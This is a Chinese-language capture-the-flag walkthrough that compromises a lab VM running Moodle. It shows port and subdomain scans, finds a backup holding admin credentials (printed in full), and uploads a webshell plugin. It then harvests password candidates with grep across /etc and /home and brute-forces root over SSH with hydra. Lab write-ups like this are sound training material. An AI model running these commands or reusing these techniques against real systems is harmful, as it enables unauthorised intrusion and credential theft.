Moddle

10.213.193.76

信息搜集

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
root@LAPTOP-O235O5EH [~] ➜  rustscan -a 10.213.193.76                                                        [11:28:08]
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Port scanning: Because every port has a story to tell.

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 10140'.
Open 10.213.193.76:22
Open 10.213.193.76:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-11 11:28 CST
Initiating ARP Ping Scan at 11:28
Scanning 10.213.193.76 [1 port]
Completed ARP Ping Scan at 11:28, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 11:28
Completed Parallel DNS resolution of 1 host. at 11:28, 0.08s elapsed
DNS resolution of 1 IPs took 0.08s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 11:28
Scanning 10.213.193.76 [2 ports]
Discovered open port 80/tcp on 10.213.193.76
Discovered open port 22/tcp on 10.213.193.76
Completed SYN Stealth Scan at 11:28, 0.03s elapsed (2 total ports)
Nmap scan report for 10.213.193.76
Host is up, received arp-response (0.00061s latency).
Scanned at 2026-01-11 11:28:33 CST for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:7F:93:0B (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.22 seconds
           Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

写入hosts文件

1
2
3
vim /etc/hosts

10.213.193.76   moodle.dsz

image

子域名爆破

1
wfuzz -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u moodle.dsz -H 'Host: FUZZ.moodle.dsz' --hh 20

image

dev子域名 目录扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
root@LAPTOP-O235O5EH [~] ➜  dirsearch -u http://dev.moodle.dsz                                               [11:54:17]
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/reports/http_dev.moodle.dsz/_26-01-11_11-54-23.txt

Target: http://dev.moodle.dsz/

[11:54:23] Starting:
[11:54:23] 403 -  279B  - /.ht_wsr.txt
[11:54:24] 403 -  279B  - /.htaccess.bak1
[11:54:24] 403 -  279B  - /.htaccess.orig
[11:54:24] 403 -  279B  - /.htaccess.sample
[11:54:24] 403 -  279B  - /.htaccess.save
[11:54:24] 403 -  279B  - /.htaccess_extra
[11:54:24] 403 -  279B  - /.htaccess_orig
[11:54:24] 403 -  279B  - /.htaccessBAK
[11:54:24] 403 -  279B  - /.htaccess_sc
[11:54:24] 403 -  279B  - /.htaccessOLD
[11:54:24] 403 -  279B  - /.htaccessOLD2
[11:54:24] 403 -  279B  - /.htm
[11:54:24] 403 -  279B  - /.html
[11:54:24] 403 -  279B  - /.htpasswds
[11:54:24] 403 -  279B  - /.httr-oauth
[11:54:24] 403 -  279B  - /.htpasswd_test
[11:54:24] 403 -  279B  - /.php
[11:54:27] 200 -   74MB - /backup.tar.gz
[11:54:29] 302 -    0B  - /dashboard.php  ->  index.php
[11:54:31] 302 -    0B  - /logout.php  ->  index.php
[11:54:35] 403 -  279B  - /server-status
[11:54:35] 403 -  279B  - /server-status/

Task Completed
root@LAPTOP-O235O5EH [~] ➜                                                                                   [11:54:38]

/backup.tar.gz

moodle.dsz的备份,在config.php发现了密码

image

登录moodle.dsz

admin:pzp5V2Of3akjaJrhRauR.

www shell

上传webshell插件

https://github.com/p0dalirius/Moodle-webshell-plugin/tree/master?tab=readme-ov-file

image

image

image

执行webshell

image

反弹shell

image

提权

www -> kotori

kotori的密码就是moddle的密码

kotori:pzp5V2Of3akjaJrhRauR.

image

kotori -> root 方案一

在opt目录下有hint

image

使用正则匹配查询

1
grep -raohE '\b[a-zA-Z0-9]{20}\b' /etc /var/www /opt /home 2>/dev/null >> a.txt

需要采用边缘匹配,因为

  • 比如一个 25 位的字符串 1234567890abcdefghijklmno​,它会从中截取前 20 位、中间 20 位等符合{20}的片段,导致结果全是无效的
  • 而加上 \b​ 后,只有完整的、前后都是非字母数字(或行首 / 行尾) 的 20 位组合才会被匹配,确保找到的是独立的 20 位字符串(符合 hint 里^[a-zA-Z0-9]{20}$的特征)。

hydra爆破

1
hydra -l root -P a.txt -t 4 -I -f -vV 10.213.193.76 ssh

image

kotori -> root 方案二

在kotori的家目录下.bash_history有历史命令记录

image

一个last和下载linpeas

last是Linux系统内置的系统审计与登录历史查询工具

last一下可以看到乱码

image

last​ 默认只显示精简的登录记录,要查看详细信息,使用 -F​(完整时间)、-i​(显示 IP 数字格式)、-w(完整用户名)

image

这个就是root的密码